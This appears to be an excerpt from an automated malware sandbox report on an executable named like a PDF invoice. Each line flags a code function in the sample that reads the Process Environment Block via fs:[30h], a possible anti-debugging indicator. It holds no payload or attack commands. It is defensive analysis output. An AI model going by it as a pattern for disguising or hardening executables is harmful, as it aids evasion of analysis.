Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B6B5D3 mov eax, dword ptr fs:[00000030h] 2_2_36B6B5D3
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF5C7 mov eax, dword ptr fs:[00000030h] 2_2_36ADF5C7
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF5C7 mov eax, dword ptr fs:[00000030h] 2_2_36ADF5C7
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF5C7 mov eax, dword ptr fs:[00000030h] 2_2_36ADF5C7
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF5C7 mov eax, dword ptr fs:[00000030h] 2_2_36ADF5C7
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF5C7 mov eax, dword ptr fs:[00000030h] 2_2_36ADF5C7
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF5C7 mov eax, dword ptr fs:[00000030h] 2_2_36ADF5C7
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF5C7 mov eax, dword ptr fs:[00000030h] 2_2_36ADF5C7
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF5C7 mov eax, dword ptr fs:[00000030h] 2_2_36ADF5C7
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF5C7 mov eax, dword ptr fs:[00000030h] 2_2_36ADF5C7
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BB753C mov eax, dword ptr fs:[00000030h] 2_2_36BB753C
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BB753C mov ecx, dword ptr fs:[00000030h] 2_2_36BB753C
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BB753C mov eax, dword ptr fs:[00000030h] 2_2_36BB753C
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B1F523 mov eax, dword ptr fs:[00000030h] 2_2_36B1F523
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AD753F mov eax, dword ptr fs:[00000030h] 2_2_36AD753F
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AD753F mov eax, dword ptr fs:[00000030h] 2_2_36AD753F
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AD753F mov eax, dword ptr fs:[00000030h] 2_2_36AD753F
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B11527 mov eax, dword ptr fs:[00000030h] 2_2_36B11527
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE3536 mov eax, dword ptr fs:[00000030h] 2_2_36AE3536
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE3536 mov eax, dword ptr fs:[00000030h] 2_2_36AE3536
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8F51B mov eax, dword ptr fs:[00000030h] 2_2_36B8F51B
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8F51B mov eax, dword ptr fs:[00000030h] 2_2_36B8F51B
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8F51B mov eax, dword ptr fs:[00000030h] 2_2_36B8F51B
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8F51B mov eax, dword ptr fs:[00000030h] 2_2_36B8F51B
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8F51B mov eax, dword ptr fs:[00000030h] 2_2_36B8F51B
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8F51B mov eax, dword ptr fs:[00000030h] 2_2_36B8F51B
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8F51B mov ecx, dword ptr fs:[00000030h] 2_2_36B8F51B
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8F51B mov ecx, dword ptr fs:[00000030h] 2_2_36B8F51B
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8F51B mov eax, dword ptr fs:[00000030h] 2_2_36B8F51B
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8F51B mov eax, dword ptr fs:[00000030h] 2_2_36B8F51B
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8F51B mov eax, dword ptr fs:[00000030h] 2_2_36B8F51B
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8F51B mov eax, dword ptr fs:[00000030h] 2_2_36B8F51B
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8F51B mov eax, dword ptr fs:[00000030h] 2_2_36B8F51B
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B01514 mov eax, dword ptr fs:[00000030h] 2_2_36B01514
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B01514 mov eax, dword ptr fs:[00000030h] 2_2_36B01514
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B01514 mov eax, dword ptr fs:[00000030h] 2_2_36B01514
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B01514 mov eax, dword ptr fs:[00000030h] 2_2_36B01514
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B01514 mov eax, dword ptr fs:[00000030h] 2_2_36B01514
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B01514 mov eax, dword ptr fs:[00000030h] 2_2_36B01514
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADB502 mov eax, dword ptr fs:[00000030h] 2_2_36ADB502
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B9550D mov eax, dword ptr fs:[00000030h] 2_2_36B9550D
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B9550D mov eax, dword ptr fs:[00000030h] 2_2_36B9550D
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B9550D mov eax, dword ptr fs:[00000030h] 2_2_36B9550D
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B69567 mov eax, dword ptr fs:[00000030h] 2_2_36B69567
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B9B56E mov eax, dword ptr fs:[00000030h] 2_2_36B9B56E
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B9B56E mov ecx, dword ptr fs:[00000030h] 2_2_36B9B56E
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B9B56E mov eax, dword ptr fs:[00000030h] 2_2_36B9B56E
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BBB55F mov eax, dword ptr fs:[00000030h] 2_2_36BBB55F
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BBB55F mov eax, dword ptr fs:[00000030h] 2_2_36BBB55F
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AD92AF mov eax, dword ptr fs:[00000030h] 2_2_36AD92AF
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BBB2BC mov eax, dword ptr fs:[00000030h] 2_2_36BBB2BC
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BBB2BC mov eax, dword ptr fs:[00000030h] 2_2_36BBB2BC
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BBB2BC mov eax, dword ptr fs:[00000030h] 2_2_36BBB2BC
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BBB2BC mov eax, dword ptr fs:[00000030h] 2_2_36BBB2BC
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BA92AB mov eax, dword ptr fs:[00000030h] 2_2_36BA92AB
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B9F2AE mov eax, dword ptr fs:[00000030h] 2_2_36B9F2AE
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE7290 mov eax, dword ptr fs:[00000030h] 2_2_36AE7290
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE7290 mov eax, dword ptr fs:[00000030h] 2_2_36AE7290
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE7290 mov eax, dword ptr fs:[00000030h] 2_2_36AE7290
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADD2EC mov eax, dword ptr fs:[00000030h] 2_2_36ADD2EC
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADD2EC mov eax, dword ptr fs:[00000030h] 2_2_36ADD2EC
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AD72E0 mov eax, dword ptr fs:[00000030h] 2_2_36AD72E0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B832DF mov eax, dword ptr fs:[00000030h] 2_2_36B832DF
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B832DF mov eax, dword ptr fs:[00000030h] 2_2_36B832DF
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B832DF mov eax, dword ptr fs:[00000030h] 2_2_36B832DF
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B832DF mov eax, dword ptr fs:[00000030h] 2_2_36B832DF
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B832DF mov eax, dword ptr fs:[00000030h] 2_2_36B832DF
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B132C0 mov eax, dword ptr fs:[00000030h] 2_2_36B132C0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B132C0 mov eax, dword ptr fs:[00000030h] 2_2_36B132C0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BB32C9 mov eax, dword ptr fs:[00000030h] 2_2_36BB32C9
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B032C5 mov eax, dword ptr fs:[00000030h] 2_2_36B032C5
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B6B214 mov eax, dword ptr fs:[00000030h] 2_2_36B6B214
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B6B214 mov eax, dword ptr fs:[00000030h] 2_2_36B6B214
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B9D270 mov eax, dword ptr fs:[00000030h] 2_2_36B9D270
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B7327E mov eax, dword ptr fs:[00000030h] 2_2_36B7327E
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B7327E mov eax, dword ptr fs:[00000030h] 2_2_36B7327E
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B7327E mov eax, dword ptr fs:[00000030h] 2_2_36B7327E
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B7327E mov eax, dword ptr fs:[00000030h] 2_2_36B7327E
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B7327E mov eax, dword ptr fs:[00000030h] 2_2_36B7327E
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B7327E mov eax, dword ptr fs:[00000030h] 2_2_36B7327E
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADB273 mov eax, dword ptr fs:[00000030h] 2_2_36ADB273
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADB273 mov eax, dword ptr fs:[00000030h] 2_2_36ADB273
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADB273 mov eax, dword ptr fs:[00000030h] 2_2_36ADB273
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B5D250 mov eax, dword ptr fs:[00000030h] 2_2_36B5D250
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B5D250 mov ecx, dword ptr fs:[00000030h] 2_2_36B5D250
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BA124C mov eax, dword ptr fs:[00000030h] 2_2_36BA124C
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BA124C mov eax, dword ptr fs:[00000030h] 2_2_36BA124C
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BA124C mov eax, dword ptr fs:[00000030h] 2_2_36BA124C
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BA124C mov eax, dword ptr fs:[00000030h] 2_2_36BA124C
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0F24A mov eax, dword ptr fs:[00000030h] 2_2_36B0F24A
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B9F247 mov eax, dword ptr fs:[00000030h] 2_2_36B9F247
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE93A6 mov eax, dword ptr fs:[00000030h] 2_2_36AE93A6
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE93A6 mov eax, dword ptr fs:[00000030h] 2_2_36AE93A6
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B81390 mov eax, dword ptr fs:[00000030h] 2_2_36B81390
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B81390 mov eax, dword ptr fs:[00000030h] 2_2_36B81390
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE1380 mov eax, dword ptr fs:[00000030h] 2_2_36AE1380
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE1380 mov eax, dword ptr fs:[00000030h] 2_2_36AE1380
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE1380 mov eax, dword ptr fs:[00000030h] 2_2_36AE1380
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE1380 mov eax, dword ptr fs:[00000030h] 2_2_36AE1380
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE1380 mov eax, dword ptr fs:[00000030h] 2_2_36AE1380
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AFF380 mov eax, dword ptr fs:[00000030h] 2_2_36AFF380
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AFF380 mov eax, dword ptr fs:[00000030h] 2_2_36AFF380
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AFF380 mov eax, dword ptr fs:[00000030h] 2_2_36AFF380
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AFF380 mov eax, dword ptr fs:[00000030h] 2_2_36AFF380
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AFF380 mov eax, dword ptr fs:[00000030h] 2_2_36AFF380
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AFF380 mov eax, dword ptr fs:[00000030h] 2_2_36AFF380
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B9F38A mov eax, dword ptr fs:[00000030h] 2_2_36B9F38A
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B133D0 mov eax, dword ptr fs:[00000030h] 2_2_36B133D0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B9D330 mov eax, dword ptr fs:[00000030h] 2_2_36B9D330
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B9D330 mov eax, dword ptr fs:[00000030h] 2_2_36B9D330
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BB3336 mov eax, dword ptr fs:[00000030h] 2_2_36BB3336
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0332D mov eax, dword ptr fs:[00000030h] 2_2_36B0332D
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AD9303 mov eax, dword ptr fs:[00000030h] 2_2_36AD9303
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AD9303 mov eax, dword ptr fs:[00000030h] 2_2_36AD9303
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B9F30A mov eax, dword ptr fs:[00000030h] 2_2_36B9F30A
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B6330C mov eax, dword ptr fs:[00000030h] 2_2_36B6330C
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B6330C mov eax, dword ptr fs:[00000030h] 2_2_36B6330C
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B6330C mov eax, dword ptr fs:[00000030h] 2_2_36B6330C
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B6330C mov eax, dword ptr fs:[00000030h] 2_2_36B6330C
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AEB360 mov eax, dword ptr fs:[00000030h] 2_2_36AEB360
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AEB360 mov eax, dword ptr fs:[00000030h] 2_2_36AEB360
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AEB360 mov eax, dword ptr fs:[00000030h] 2_2_36AEB360
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AEB360 mov eax, dword ptr fs:[00000030h] 2_2_36AEB360
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AEB360 mov eax, dword ptr fs:[00000030h] 2_2_36AEB360
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AEB360 mov eax, dword ptr fs:[00000030h] 2_2_36AEB360
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BB50B7 mov eax, dword ptr fs:[00000030h] 2_2_36BB50B7
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B9B0AF mov eax, dword ptr fs:[00000030h] 2_2_36B9B0AF
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8F0A5 mov eax, dword ptr fs:[00000030h] 2_2_36B8F0A5
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8F0A5 mov eax, dword ptr fs:[00000030h] 2_2_36B8F0A5
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8F0A5 mov eax, dword ptr fs:[00000030h] 2_2_36B8F0A5
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8F0A5 mov eax, dword ptr fs:[00000030h] 2_2_36B8F0A5
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8F0A5 mov eax, dword ptr fs:[00000030h] 2_2_36B8F0A5
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8F0A5 mov eax, dword ptr fs:[00000030h] 2_2_36B8F0A5
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8F0A5 mov eax, dword ptr fs:[00000030h] 2_2_36B8F0A5
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B67090 mov eax, dword ptr fs:[00000030h] 2_2_36B67090
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B1D0F0 mov eax, dword ptr fs:[00000030h] 2_2_36B1D0F0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B1D0F0 mov ecx, dword ptr fs:[00000030h] 2_2_36B1D0F0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AD90F8 mov eax, dword ptr fs:[00000030h] 2_2_36AD90F8
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AD90F8 mov eax, dword ptr fs:[00000030h] 2_2_36AD90F8
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AD90F8 mov eax, dword ptr fs:[00000030h] 2_2_36AD90F8
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AD90F8 mov eax, dword ptr fs:[00000030h] 2_2_36AD90F8
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8B0D0 mov eax, dword ptr fs:[00000030h] 2_2_36B8B0D0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8B0D0 mov eax, dword ptr fs:[00000030h] 2_2_36B8B0D0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8B0D0 mov eax, dword ptr fs:[00000030h] 2_2_36B8B0D0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADB0D6 mov eax, dword ptr fs:[00000030h] 2_2_36ADB0D6
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADB0D6 mov eax, dword ptr fs:[00000030h] 2_2_36ADB0D6
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADB0D6 mov eax, dword ptr fs:[00000030h] 2_2_36ADB0D6
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADB0D6 mov eax, dword ptr fs:[00000030h] 2_2_36ADB0D6
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AFB0D0 mov eax, dword ptr fs:[00000030h] 2_2_36AFB0D0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADD02D mov eax, dword ptr fs:[00000030h] 2_2_36ADD02D
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B87030 mov eax, dword ptr fs:[00000030h] 2_2_36B87030
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B05004 mov eax, dword ptr fs:[00000030h] 2_2_36B05004
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B05004 mov ecx, dword ptr fs:[00000030h] 2_2_36B05004
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BB1076 mov eax, dword ptr fs:[00000030h] 2_2_36BB1076
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BB1076 mov eax, dword ptr fs:[00000030h] 2_2_36BB1076
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B89060 mov eax, dword ptr fs:[00000030h] 2_2_36B89060
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE7072 mov eax, dword ptr fs:[00000030h] 2_2_36AE7072
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BB505B mov eax, dword ptr fs:[00000030h] 2_2_36BB505B
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE1051 mov eax, dword ptr fs:[00000030h] 2_2_36AE1051
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE1051 mov eax, dword ptr fs:[00000030h] 2_2_36AE1051
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BB51B6 mov eax, dword ptr fs:[00000030h] 2_2_36BB51B6
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B131BE mov eax, dword ptr fs:[00000030h] 2_2_36B131BE
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B131BE mov eax, dword ptr fs:[00000030h] 2_2_36B131BE
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B21190 mov eax, dword ptr fs:[00000030h] 2_2_36B21190
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B21190 mov eax, dword ptr fs:[00000030h] 2_2_36B21190
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B09194 mov eax, dword ptr fs:[00000030h] 2_2_36B09194
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0F1F0 mov eax, dword ptr fs:[00000030h] 2_2_36B0F1F0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0F1F0 mov eax, dword ptr fs:[00000030h] 2_2_36B0F1F0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B7D1F0 mov eax, dword ptr fs:[00000030h] 2_2_36B7D1F0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE91E5 mov eax, dword ptr fs:[00000030h] 2_2_36AE91E5
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE91E5 mov eax, dword ptr fs:[00000030h] 2_2_36AE91E5
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0B1E0 mov eax, dword ptr fs:[00000030h] 2_2_36B0B1E0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0B1E0 mov eax, dword ptr fs:[00000030h] 2_2_36B0B1E0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0B1E0 mov eax, dword ptr fs:[00000030h] 2_2_36B0B1E0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0B1E0 mov eax, dword ptr fs:[00000030h] 2_2_36B0B1E0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0B1E0 mov eax, dword ptr fs:[00000030h] 2_2_36B0B1E0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0B1E0 mov eax, dword ptr fs:[00000030h] 2_2_36B0B1E0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0B1E0 mov eax, dword ptr fs:[00000030h] 2_2_36B0B1E0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AD91F0 mov eax, dword ptr fs:[00000030h] 2_2_36AD91F0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AD91F0 mov eax, dword ptr fs:[00000030h] 2_2_36AD91F0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AF51C0 mov eax, dword ptr fs:[00000030h] 2_2_36AF51C0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AF51C0 mov eax, dword ptr fs:[00000030h] 2_2_36AF51C0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AF51C0 mov eax, dword ptr fs:[00000030h] 2_2_36AF51C0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AF51C0 mov eax, dword ptr fs:[00000030h] 2_2_36AF51C0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B9F13E mov eax, dword ptr fs:[00000030h] 2_2_36B9F13E
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BB3136 mov eax, dword ptr fs:[00000030h] 2_2_36BB3136
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B17128 mov eax, dword ptr fs:[00000030h] 2_2_36B17128
